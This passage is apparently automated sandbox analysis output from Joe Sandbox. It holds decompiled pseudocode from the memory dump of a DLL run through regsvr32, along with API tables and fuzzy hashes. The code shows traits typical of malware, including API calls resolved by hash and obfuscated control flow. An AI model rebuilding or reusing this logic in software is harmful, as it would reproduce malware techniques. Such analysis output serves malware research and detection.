                  				signed long long _t152;
                  				void* _t154;
                  				void* _t155;
                  				void* _t171;
                  				void* _t172;
                  				void* _t174;
                  				void* _t177;
                  
                  				_t118 = __rbx;
                  				 *((long long*)(_t154 + 8)) = __rbx;
                  				 *(_t154 + 0x18) = _t152;
                  				_t155 = _t154 - 0x40;
                  				_t115 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ _t72;
                  				_t148 = __r8;
                  				_t172 = __rcx;
                  				_t4 = _t152 + 1; // 0x1
                  				_t82 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(__rbx, __r8, __rdx, __r8, _t177);
                  				if (_t115 == 0) goto 0x8000583e;
                  				 *(_t155 + 0x20) =  *(_t155 + 0x20) & _t118;
                  				if (E00000001180002668(_t82, __ecx, _t115, _t118, _t172, 0x180001844, _t148, _t152, _t115,  *((intOrPtr*)(_t155 + 0x90)), _t174, _t171) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(??, ??, ??);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t144);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t126 = _t115;
                  				E000000011800024CC(_t118, _t126, 0x180001844, _t148, _t147);
                  				_t149 = _t115;
                  				if (_t115 == 0) goto 0x8000583e;
                  				if (_t82 + _t82 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t126 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t141 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t155 + 0x20) =  *(_t155 + 0x20) & _t152;
                  				if (E00000001180002668(_t82 + _t82 + 0x4ce, __ecx, 0x18000543c, _t118, _t172,  ==  ? 0x18000543c : 0x180001b7c, _t149, _t152, _t149,  *((intOrPtr*)(_t155 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t82 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t149 == 0) goto 0x8000595f;
                  				if ( *_t149 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(_t82, 0x18000543c, _t118, _t149, _t155 + 0x30, _t149) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t46, 0, _t149, _t155 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t155 + 0x32)) =  *(_t155 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t172 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t172 + 0x50) =  *(_t172 + 0x50) & 0x00000000;
                  				E00000001180007950( *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t172 + 0x50), _t155 + 0x30, _t115,  *(_t172 + 0x50), _t152);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t82 == 0) goto 0x800059bb;
                  				_t70 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t155 + 0x30, _t115,  *(_t172 + 0x50), _t152,  *((intOrPtr*)(_t172 + 0x38)), _t172 + 0x50);
                  				if ( *((long long*)(_t155 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t70 == 0x3e5) goto 0x800059e1;
                  				r8d = _t70;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t172,  *((intOrPtr*)(_t155 + 0x90)), _t152);
                  				return _t70;
                  			}






















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 45%
                  			E00000001180004A14(void* __ecx, void* __ebp, void* __eflags, long long* __rax, long long __rbx, void* __rdx, long long __rsi) {
                  				void* _t47;
                  				intOrPtr _t58;
                  				void* _t62;
                  				long _t68;
                  				void* _t75;
                  				void* _t94;
                  				void* _t95;
                  				intOrPtr _t99;
                  				void* _t100;
                  				long long* _t119;
                  				long long* _t120;
                  				void* _t146;
                  				long long _t151;
                  				void* _t153;
                  				void* _t154;
                  				void* _t161;
                  				int _t165;
                  				int _t169;
                  				void* _t171;
                  
                  				_t119 = __rax;
                  				 *((long long*)(_t153 + 8)) = __rbx;
                  				 *((long long*)(_t153 + 0x10)) = _t151;
                  				 *((long long*)(_t153 + 0x18)) = __rsi;
                  				_t154 = _t153 - 0x80;
                  				_t147 =  *0x8000d4a0;
                  				r14d = __ecx;
                  				_t99 = r8d;
                  				E0000000118000459C(_t47, 0x4e1c2e77,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t119 == 0) goto 0x80004a75;
                  				r9d = 0x18;
                  				r8d = 0;
                  				 *((intOrPtr*)(_t154 + 0x20)) = 0xf0000040;
                  				 *_t119();
                  				goto 0x80004a77;
                  				if (0 == 0) goto 0x80004c20;
                  				r8d =  *((intOrPtr*)(_t154 + 0xe0));
                  				_t10 = _t154 + 0x48; // -190
                  				if (E00000001180006D04(_t75, _t94, _t95, __rbx,  *((intOrPtr*)(_t154 + 0x50)), __rsi, _t10) != 0) goto 0x80004c02;
                  				_t11 = _t119 + 0x10; // 0x10
                  				r15d = _t11;
                  				E0000000118000459C(memset(_t171, _t169, _t165), 0xd74cfe41,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t119 == 0) goto 0x80004ae3;
                  				r9d = 0;
                  				 *_t119();
                  				goto 0x80004ae5;
                  				if (0 != 0) goto 0x80004af9;
                  				if (GetLastError() != 0) goto 0x80004c02;
                  				_t58 =  >  ? r15d : _t99;
                  				r8d = _t58;
                  				 *((intOrPtr*)(_t154 + 0x40)) = _t58;
                  				memcpy(_t161, _t146);
                  				_t100 = _t99 -  *((intOrPtr*)(_t154 + 0x40));
                  				if (r14d == 0) goto 0x80004b70;
                  				E0000000118000459C( *((intOrPtr*)(_t154 + 0x40)), 0x4217c141,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t119 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t23 = _t154 + 0x40; // -198
                  				 *((intOrPtr*)(_t154 + 0x30)) = 0x20;
                  				 *((long long*)(_t154 + 0x28)) = _t23;
                  				_t26 = _t154 + 0x58; // -174
                  				r8b = _t100 == 0;
                  				 *((long long*)(_t154 + 0x20)) = _t26;
                  				r9d = 0;
                  				_t62 =  *_t119();
                  				goto 0x80004bac;
                  				E0000000118000459C(_t62, 0x8ea73a36,  *((intOrPtr*)(_t154 + 0x48)));
                  				if (_t119 == 0) goto 0x80004baa;
                  				r8d = 0;
                  				_t29 = _t154 + 0x40; // -198
                  				 *((long long*)(_t154 + 0x28)) = _t29;
                  				r8b = _t100 == 0;
                  				_t31 = _t154 + 0x58; // -174
                  				 *((long long*)(_t154 + 0x20)) = _t31;
                  				r9d = 0;
                  				 *_t119();
                  				goto 0x80004bac;
                  				if (0 == 0) goto 0x80004bd6;
                  				r8d =  *((intOrPtr*)(_t154 + 0x40));
                  				memcpy(??, ??, ??);
                  				if (_t100 == 0) goto 0x80004bde;
                  				goto 0x80004afd;
                  				_t68 = GetLastError();
                  				_t120 =  *((intOrPtr*)(_t154 + 0xd0));
                  				 *_t120 = 0 +  *((intOrPtr*)(_t154 + 0x40));
                  				E0000000118000459C(_t68, 0xff709000,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t120 == 0) goto 0x80004c02;
                  				E0000000118000459C( *_t120(), 0xbaca8f4d,  *((intOrPtr*)(_t147 + 0x20)));
                  				if (_t120 == 0) goto 0x80004c28;
                  				 *_t120();
                  				goto 0x80004c28;
                  				return GetLastError();
                  			}






















                  0x180004a14
                  0x180004a14
                  0x180004a19
                  0x180004a1e
                  0x180004a2c
                  0x180004a33
                  0x180004a3a
                  0x180004a4c
                  0x180004a4f
                  0x180004a57
                  0x180004a5e
                  0x180004a64
                  0x180004a69
                  0x180004a71
                  0x180004a73
                  0x180004a79
                  0x180004a7f
                  0x180004a94
                  0x180004aa2
                  0x180004aa8
                  0x180004aa8
                  0x180004ac5
                  0x180004acd
                  0x180004adc
                  0x180004adf
                  0x180004ae1
                  0x180004ae7
                  0x180004af3
                  0x180004b07
                  0x180004b0e
                  0x180004b11
                  0x180004b15
                  0x180004b1e
                  0x180004b2c
                  0x180004b33
                  0x180004b3b
                  0x180004b3d
                  0x180004b40
                  0x180004b45
                  0x180004b4d
                  0x180004b52
                  0x180004b59
                  0x180004b5d
                  0x180004b67
                  0x180004b6c
                  0x180004b6e
                  0x180004b75
                  0x180004b7d
                  0x180004b7f
                  0x180004b82
                  0x180004b89
                  0x180004b8e
                  0x180004b92
                  0x180004b97
                  0x180004ba1
                  0x180004ba6
                  0x180004ba8
                  0x180004bae
                  0x180004bb0
                  0x180004bbd
                  0x180004bcf
                  0x180004bd1
                  0x180004bd6
                  0x180004bde
                  0x180004beb
                  0x180004bf1
                  0x180004bf9
                  0x180004c0b
                  0x180004c13
                  0x180004c1c
                  0x180004c1e
                  0x180004c4a

                  APIs
                    • Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8
                  • memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
                  • memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
                  • GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast$memcpy$memset
                  • String ID: $@
                  • API String ID: 1408984137-1077428164
                  • Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
                  • Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
                  • Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E00000001180003A24(void* __ecx, long long __rbx, long long __rcx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				void* _t39;
                  				void* _t41;
                  				long _t49;
                  				void* _t50;
                  				void* _t72;
                  				void* _t75;
                  				signed long long _t95;
                  				signed long long _t96;
                  				void* _t98;
                  				void* _t110;
                  				int _t113;
                  				void* _t114;
                  				signed long long _t119;
                  				void* _t121;
                  				long long* _t127;
                  				void* _t129;
                  				signed long long _t130;
                  				void* _t132;
                  
                  				 *((long long*)(_t121 + 8)) = __rbx;
                  				 *(_t121 + 0x10) = _t119;
                  				 *((long long*)(_t121 + 0x18)) = __rsi;
                  				_t117 =  *0x8000d4a0;
                  				_t114 = __r9;
                  				_t98 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t132, _t129, _t113);
                  				InitializeCriticalSection(??);
                  				_t6 = _t98 + 0x88; // 0x88
                  				_t127 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t130 = _t129 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t130 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t127;
                  				 *_t127 = _t127;
                  				 *(__rcx + 0x10) = _t130;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t119;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				_t39 = E00000001180001C00(__rcx, __r9, _t110, __r9,  *0x8000d4a0, _t119);
                  				 *_t98 = E00000001180008368;
                  				E0000000118000459C(_t39, 0x176fdd38,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t130 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				_t41 = E00000001180008368(__r9 - 4, r13d, _t75,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t119);
                  				goto 0x80003b4f;
                  				_t95 = _t130;
                  				 *(_t98 + 0x10) = _t95;
                  				if (_t95 != _t130) goto 0x80003bb0;
                  				E0000000118000459C(_t41, 0xb27f4910,  *((intOrPtr*)(_t117 + 0x30)));
                  				if (_t95 == 0) goto 0x80003b79;
                  				 *_t95();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0, 0x176fdd38,  *((intOrPtr*)(_t117 + 0x30)));
                  				if (_t95 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t95();
                  				goto 0x80003ba7;
                  				_t96 = _t130;
                  				 *(_t98 + 0x10) = _t96;
                  				if (_t96 == _t130) goto 0x80003bd6;
                  				_t28 = _t98 + 0x18; // 0x18
                  				E00000001180006C8C(_t96, _t98, E0000000118000431C, _t98, _t117, _t119, _t28);
                  				 *(_t98 + 8) = _t96;
                  				if (_t96 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				_t50 = E00000001180007950(_t98, _t98, _t98, _t114, _t117, _t119);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(_t50, 0x9cb92d3f,  *((intOrPtr*)(_t117 + 0x30)));
                  				if (_t96 == 0) goto 0x80003c03;
                  				 *_t96();
                  				return _t49;
                  			}






















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E00000001180002B60(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				int _t80;
                  				signed int _t94;
                  				void* _t111;
                  				void* _t146;
                  				long long _t178;
                  				long long* _t179;
                  				long long* _t182;
                  				void* _t184;
                  				long long _t186;
                  				void* _t194;
                  				intOrPtr _t215;
                  				void* _t228;
                  				void* _t229;
                  				long long _t232;
                  				void* _t233;
                  				void* _t259;
                  				signed long long _t260;
                  
                  				_t260 = __r11;
                  				_t259 = __r10;
                  				_t178 = _t232;
                  				_t233 = _t232 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t178 + 0x20) =  *(_t178 + 0x20) & 0x00000000;
                  				_t229 = __rcx;
                  				if (E00000001180002464(_t178, _t184,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t178, _t184,  *0x8000d4a0 + 0x20, _t229);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				_t80 = HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t194 = _t233 + 0x48;
                  				if (E00000001180008C60(_t80, _t111, _t184, _t194, _t228, _t229) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t229 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t194 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(__r9 +  *((intOrPtr*)(_t229 + 0x40)) + 8, __r9 + 8);
                  				_t186 = _t178;
                  				goto 0x80002c2d;
                  				if (_t186 == 0) goto 0x80002ec8;
                  				_t21 = _t229 + 0xb0; // 0xb0
                  				 *((long long*)(_t233 + 0x28)) = _t186;
                  				 *(_t233 + 0x20) =  *(_t233 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t186, _t186, _t21,  *((intOrPtr*)(_t233 + 0x48)), _t229,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x30)),  *((intOrPtr*)(_t229 + 0x38))) != 0) goto 0x80002ec8;
                  				_t179 =  *((intOrPtr*)(_t229 + 0x28));
                  				 *((long long*)(_t233 + 0x40)) = _t179;
                  				if (E00000001180002370(_t186,  *((intOrPtr*)(_t233 + 0x48)), _t260) != 0) goto 0x80002caf;
                  				if (E000000011800038F8(_t86, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t233 + 0xa8) = 0;
                  				E0000000118000459C(_t87, 0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t179 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t179();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t229 + 0x64) = 0x3e8;
                  				if (E00000001180002370(_t186, _t233 + 0x40, _t260) != 0) goto 0x80002d41;
                  				 *(_t233 + 0x20) =  *(_t233 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(0, 0x17fffff82, _t179, _t186, _t229, 0x180001844, _t229,  *0x8000d490,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb0);
                  				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8(_t92, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t233 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t229 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8(_t96, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t233 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002e40;
                  				if (E000000011800038F8(_t98, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t233 + 0xb8));
                  				 *((intOrPtr*)(_t229 + 0x60)) = r11d;
                  				_t182 = _t260 * 0x23c34600 +  *((intOrPtr*)(_t233 + 0x50));
                  				 *((long long*)(_t229 + 0x58)) = _t182;
                  				if (E00000001180007DBC(0, 0x17fffff82, 0, 0, E000000011800038F8(_t98, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb8), _t229, _t233 + 0x58, _t233 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t233 + 0x30));
                  				E0000000118000459C(E0000000118000137C(0x17fffff82, 0, r15d, __esi, 0, _t186, _t229,  *((intOrPtr*)(_t233 + 0x58)), _t259), 0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t182 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t182();
                  				goto 0x80002e9a;
                  				_t146 = r15d;
                  				if (_t146 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t229 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950( *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t229 + 0x50)), _t233 + 0x40, _t228,  *((intOrPtr*)(_t229 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t215 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t215 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t215 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t146;
                  			}

























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
